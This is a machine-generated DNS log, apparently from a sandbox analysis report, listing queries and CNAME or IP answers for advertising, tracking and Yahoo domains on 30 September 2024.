                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:46.238610029 CEST1.1.1.1192.168.2.40xf6cfNo error (0)assets.a-mo.netassets.a-mo.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:46.239712000 CEST1.1.1.1192.168.2.40xf48bNo error (0)assets.a-mo.netassets.a-mo.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:46.908624887 CEST1.1.1.1192.168.2.40x8d8fNo error (0)id.rlcdn.com35.244.174.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:47.044523954 CEST1.1.1.1192.168.2.40xa9cbNo error (0)s0.2mdn.net142.250.184.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:47.129458904 CEST1.1.1.1192.168.2.40xf6d8No error (0)cs.emxdgt.com35.156.245.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:47.129458904 CEST1.1.1.1192.168.2.40xf6d8No error (0)cs.emxdgt.com3.73.226.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:47.467818975 CEST1.1.1.1192.168.2.40x9f7fNo error (0)assets.a-mo.netassets.a-mo.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:47.470002890 CEST1.1.1.1192.168.2.40xd306No error (0)assets.a-mo.netassets.a-mo.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:48.440912962 CEST1.1.1.1192.168.2.40x5a41No error (0)pippio.com107.178.254.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:48.569749117 CEST1.1.1.1192.168.2.40xb660No error (0)sonata-notifications.taptapnetworks.com3.127.201.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:48.569749117 CEST1.1.1.1192.168.2.40xb660No error (0)sonata-notifications.taptapnetworks.com18.193.1.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.134083033 CEST1.1.1.1192.168.2.40x2006No error (0)ad.mrtnsvr.com34.102.163.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.367018938 CEST1.1.1.1192.168.2.40xc807No error (0)pool.admedo.compool-com.adizio.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.367018938 CEST1.1.1.1192.168.2.40xc807No error (0)pool-com.adizio.iponweb.netadizio.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.367018938 CEST1.1.1.1192.168.2.40xc807No error (0)adizio.geo.iponweb.netadizio-stable-europe-west1.pumpkin.uverse.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.368774891 CEST1.1.1.1192.168.2.40x2415No error (0)pool.admedo.compool-com.adizio.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.368774891 CEST1.1.1.1192.168.2.40x2415No error (0)pool-com.adizio.iponweb.netadizio.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.368774891 CEST1.1.1.1192.168.2.40x2415No error (0)adizio.geo.iponweb.netadizio-stable-europe-west1.pumpkin.uverse.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.368774891 CEST1.1.1.1192.168.2.40x2415No error (0)adizio-stable-europe-west1.pumpkin.uverse.iponweb.net35.206.140.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.553400040 CEST1.1.1.1192.168.2.40x3ec2No error (0)ipac.ctnsnet.com35.186.193.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.564007998 CEST1.1.1.1192.168.2.40xe81aNo error (0)d5p.de17a.comnlb-dflb-496f722d06cc67e2.elb.eu-north-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.564249992 CEST1.1.1.1192.168.2.40x93fNo error (0)d5p.de17a.comnlb-dflb-496f722d06cc67e2.elb.eu-north-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.564249992 CEST1.1.1.1192.168.2.40x93fNo error (0)nlb-dflb-496f722d06cc67e2.elb.eu-north-1.amazonaws.com13.50.192.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.564249992 CEST1.1.1.1192.168.2.40x93fNo error (0)nlb-dflb-496f722d06cc67e2.elb.eu-north-1.amazonaws.com13.53.196.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.575179100 CEST1.1.1.1192.168.2.40x8021No error (0)dsp.360yield.comice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.575179100 CEST1.1.1.1192.168.2.40x8021No error (0)ice.360yield.comeuw-ice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.576067924 CEST1.1.1.1192.168.2.40xd455No error (0)dsp.360yield.comice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.576067924 CEST1.1.1.1192.168.2.40xd455No error (0)ice.360yield.comeuw-ice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.576067924 CEST1.1.1.1192.168.2.40xd455No error (0)euw-ice.360yield.com34.250.159.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.576067924 CEST1.1.1.1192.168.2.40xd455No error (0)euw-ice.360yield.com34.250.245.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.576067924 CEST1.1.1.1192.168.2.40xd455No error (0)euw-ice.360yield.com34.253.109.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.576067924 CEST1.1.1.1192.168.2.40xd455No error (0)euw-ice.360yield.com52.209.201.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.576067924 CEST1.1.1.1192.168.2.40xd455No error (0)euw-ice.360yield.com108.128.221.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.576067924 CEST1.1.1.1192.168.2.40xd455No error (0)euw-ice.360yield.com54.194.167.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.576067924 CEST1.1.1.1192.168.2.40xd455No error (0)euw-ice.360yield.com52.210.197.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.576067924 CEST1.1.1.1192.168.2.40xd455No error (0)euw-ice.360yield.com34.251.49.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.585038900 CEST1.1.1.1192.168.2.40x9a1cNo error (0)core.iprom.net195.5.165.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.590691090 CEST1.1.1.1192.168.2.40x769bNo error (0)id.a-mx.com79.127.227.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.590691090 CEST1.1.1.1192.168.2.40x769bNo error (0)id.a-mx.com79.127.216.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.907495022 CEST1.1.1.1192.168.2.40xc1eaNo error (0)cm-supply-web.gammaplatform.com35.186.154.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.929822922 CEST1.1.1.1192.168.2.40x2937No error (0)cm.adgrx.comrtb.adgrx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.941343069 CEST1.1.1.1192.168.2.40x2652No error (0)cm.adgrx.comrtb.adgrx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.941343069 CEST1.1.1.1192.168.2.40x2652No error (0)rtb.adgrx.com52.215.155.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.110336065 CEST1.1.1.1192.168.2.40xe9f4No error (0)green.erne.co141.94.242.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.110336065 CEST1.1.1.1192.168.2.40xe9f4No error (0)green.erne.co141.95.171.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.110336065 CEST1.1.1.1192.168.2.40xe9f4No error (0)green.erne.co141.94.161.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.110336065 CEST1.1.1.1192.168.2.40xe9f4No error (0)green.erne.co141.94.242.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.110336065 CEST1.1.1.1192.168.2.40xe9f4No error (0)green.erne.co141.95.171.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.110336065 CEST1.1.1.1192.168.2.40xe9f4No error (0)green.erne.co141.94.240.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.110336065 CEST1.1.1.1192.168.2.40xe9f4No error (0)green.erne.co141.95.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.110336065 CEST1.1.1.1192.168.2.40xe9f4No error (0)green.erne.co141.94.242.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.110336065 CEST1.1.1.1192.168.2.40xe9f4No error (0)green.erne.co141.95.171.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.110336065 CEST1.1.1.1192.168.2.40xe9f4No error (0)green.erne.co141.95.171.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.110336065 CEST1.1.1.1192.168.2.40xe9f4No error (0)green.erne.co141.94.161.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.159358025 CEST1.1.1.1192.168.2.40x54c5No error (0)a.tribalfusion.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.159468889 CEST1.1.1.1192.168.2.40x1ca5No error (0)a.tribalfusion.com104.18.37.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.159468889 CEST1.1.1.1192.168.2.40x1ca5No error (0)a.tribalfusion.com172.64.150.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.308821917 CEST1.1.1.1192.168.2.40xb381No error (0)matching.truffle.bid162.55.120.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.308821917 CEST1.1.1.1192.168.2.40xb381No error (0)matching.truffle.bid23.88.86.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.676930904 CEST1.1.1.1192.168.2.40x3869No error (0)pb-am.a-mo.net163.5.194.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.676930904 CEST1.1.1.1192.168.2.40x3869No error (0)pb-am.a-mo.net163.5.194.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.676930904 CEST1.1.1.1192.168.2.40x3869No error (0)pb-am.a-mo.net163.5.194.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.676930904 CEST1.1.1.1192.168.2.40x3869No error (0)pb-am.a-mo.net163.5.194.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.676930904 CEST1.1.1.1192.168.2.40x3869No error (0)pb-am.a-mo.net163.5.194.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.676930904 CEST1.1.1.1192.168.2.40x3869No error (0)pb-am.a-mo.net163.5.194.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.676930904 CEST1.1.1.1192.168.2.40x3869No error (0)pb-am.a-mo.net163.5.194.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.676930904 CEST1.1.1.1192.168.2.40x3869No error (0)pb-am.a-mo.net163.5.194.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.677026987 CEST1.1.1.1192.168.2.40xf003No error (0)sync.a-mo.netnld-prebid.a-mx.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.677026987 CEST1.1.1.1192.168.2.40xf003No error (0)nld-prebid.a-mx.net163.5.194.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.677026987 CEST1.1.1.1192.168.2.40xf003No error (0)nld-prebid.a-mx.net163.5.194.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.677026987 CEST1.1.1.1192.168.2.40xf003No error (0)nld-prebid.a-mx.net163.5.194.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.677026987 CEST1.1.1.1192.168.2.40xf003No error (0)nld-prebid.a-mx.net163.5.194.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.677026987 CEST1.1.1.1192.168.2.40xf003No error (0)nld-prebid.a-mx.net163.5.194.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.677026987 CEST1.1.1.1192.168.2.40xf003No error (0)nld-prebid.a-mx.net163.5.194.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.677026987 CEST1.1.1.1192.168.2.40xf003No error (0)nld-prebid.a-mx.net163.5.194.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.677026987 CEST1.1.1.1192.168.2.40xf003No error (0)nld-prebid.a-mx.net163.5.194.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.678020954 CEST1.1.1.1192.168.2.40x9302No error (0)sync.a-mo.netnld-prebid.a-mx.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.829907894 CEST1.1.1.1192.168.2.40x31cdNo error (0)s.tribalfusion.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.832710028 CEST1.1.1.1192.168.2.40x853cNo error (0)s.tribalfusion.com104.18.37.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.832710028 CEST1.1.1.1192.168.2.40x853cNo error (0)s.tribalfusion.com172.64.150.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.027894020 CEST1.1.1.1192.168.2.40xca3cNo error (0)pixel-eu.onaudience.com54.38.113.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.027894020 CEST1.1.1.1192.168.2.40xca3cNo error (0)pixel-eu.onaudience.com54.38.113.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.027894020 CEST1.1.1.1192.168.2.40xca3cNo error (0)pixel-eu.onaudience.com54.38.113.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.027894020 CEST1.1.1.1192.168.2.40xca3cNo error (0)pixel-eu.onaudience.com54.38.113.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.027894020 CEST1.1.1.1192.168.2.40xca3cNo error (0)pixel-eu.onaudience.com54.38.113.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.027894020 CEST1.1.1.1192.168.2.40xca3cNo error (0)pixel-eu.onaudience.com54.38.113.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.027894020 CEST1.1.1.1192.168.2.40xca3cNo error (0)pixel-eu.onaudience.com54.38.113.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.617520094 CEST1.1.1.1192.168.2.40xd2f2No error (0)rtb.openx.net35.227.252.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.617520094 CEST1.1.1.1192.168.2.40xd2f2No error (0)rtb.openx.net35.186.253.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.621450901 CEST1.1.1.1192.168.2.40xd0d6No error (0)cm.adform.nettrack-eu.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.621648073 CEST1.1.1.1192.168.2.40xd474No error (0)cm.adform.nettrack-eu.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.624018908 CEST1.1.1.1192.168.2.40x7878No error (0)ssum.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.624018908 CEST1.1.1.1192.168.2.40x7878No error (0)ssum.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.625468016 CEST1.1.1.1192.168.2.40x96f3No error (0)ssum.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:52.223970890 CEST1.1.1.1192.168.2.40x7bd0No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.182907104 CEST1.1.1.1192.168.2.40x6515No error (0)stags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.185009956 CEST1.1.1.1192.168.2.40x5893No error (0)stags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.695633888 CEST1.1.1.1192.168.2.40x237bNo error (0)prebid.adnxs.comxandr-prebid.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.697520018 CEST1.1.1.1192.168.2.40xe163No error (0)ow.pubmatic.comowv2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.697520018 CEST1.1.1.1192.168.2.40xe163No error (0)owv2.pubmnet.comow-amsc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.699932098 CEST1.1.1.1192.168.2.40x2712No error (0)ow.pubmatic.comowv2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.699932098 CEST1.1.1.1192.168.2.40x2712No error (0)owv2.pubmnet.comow-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.699932098 CEST1.1.1.1192.168.2.40x2712No error (0)ow-lhrc.pubmnet.com185.64.190.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:54.162580013 CEST1.1.1.1192.168.2.40x7d7fNo error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:54.162580013 CEST1.1.1.1192.168.2.40x7d7fNo error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:54.162580013 CEST1.1.1.1192.168.2.40x7d7fNo error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:54.163156986 CEST1.1.1.1192.168.2.40x1cbbNo error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:54.852545977 CEST1.1.1.1192.168.2.40x8c0cNo error (0)id.a-mx.com79.127.216.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:54.852545977 CEST1.1.1.1192.168.2.40x8c0cNo error (0)id.a-mx.com79.127.227.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:55.700730085 CEST1.1.1.1192.168.2.40xc775No error (0)geo.yahoo.comgeo-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:55.700849056 CEST1.1.1.1192.168.2.40x6d78No error (0)geo.yahoo.comgeo-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:55.700849056 CEST1.1.1.1192.168.2.40x6d78No error (0)geo-atsv2.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.799370050 CEST1.1.1.1192.168.2.40xd263No error (0)prebid.adnxs.comxandr-prebid.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.799387932 CEST1.1.1.1192.168.2.40x7c81No error (0)ow.pubmatic.comowv2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.799387932 CEST1.1.1.1192.168.2.40x7c81No error (0)owv2.pubmnet.comow-amsc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.799387932 CEST1.1.1.1192.168.2.40x7c81No error (0)ow-amsc.pubmnet.com185.64.189.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.799428940 CEST1.1.1.1192.168.2.40x71cdNo error (0)ow.pubmatic.comowv2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.799428940 CEST1.1.1.1192.168.2.40x71cdNo error (0)owv2.pubmnet.comow-amsc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.839811087 CEST1.1.1.1192.168.2.40x8f34No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.839811087 CEST1.1.1.1192.168.2.40x8f34No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.839811087 CEST1.1.1.1192.168.2.40x8f34No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.840188980 CEST1.1.1.1192.168.2.40xa3cfNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.069309950 CEST1.1.1.1192.168.2.40x4e5cNo error (0)query2.finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.073291063 CEST1.1.1.1192.168.2.40xea3fNo error (0)query2.finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.073291063 CEST1.1.1.1192.168.2.40xea3fNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.073291063 CEST1.1.1.1192.168.2.40xea3fNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.142976046 CEST1.1.1.1192.168.2.40xe7d4No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.143186092 CEST1.1.1.1192.168.2.40x25f3No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.143186092 CEST1.1.1.1192.168.2.40x25f3No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.143186092 CEST1.1.1.1192.168.2.40x25f3No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.265611887 CEST1.1.1.1192.168.2.40x7ef4No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
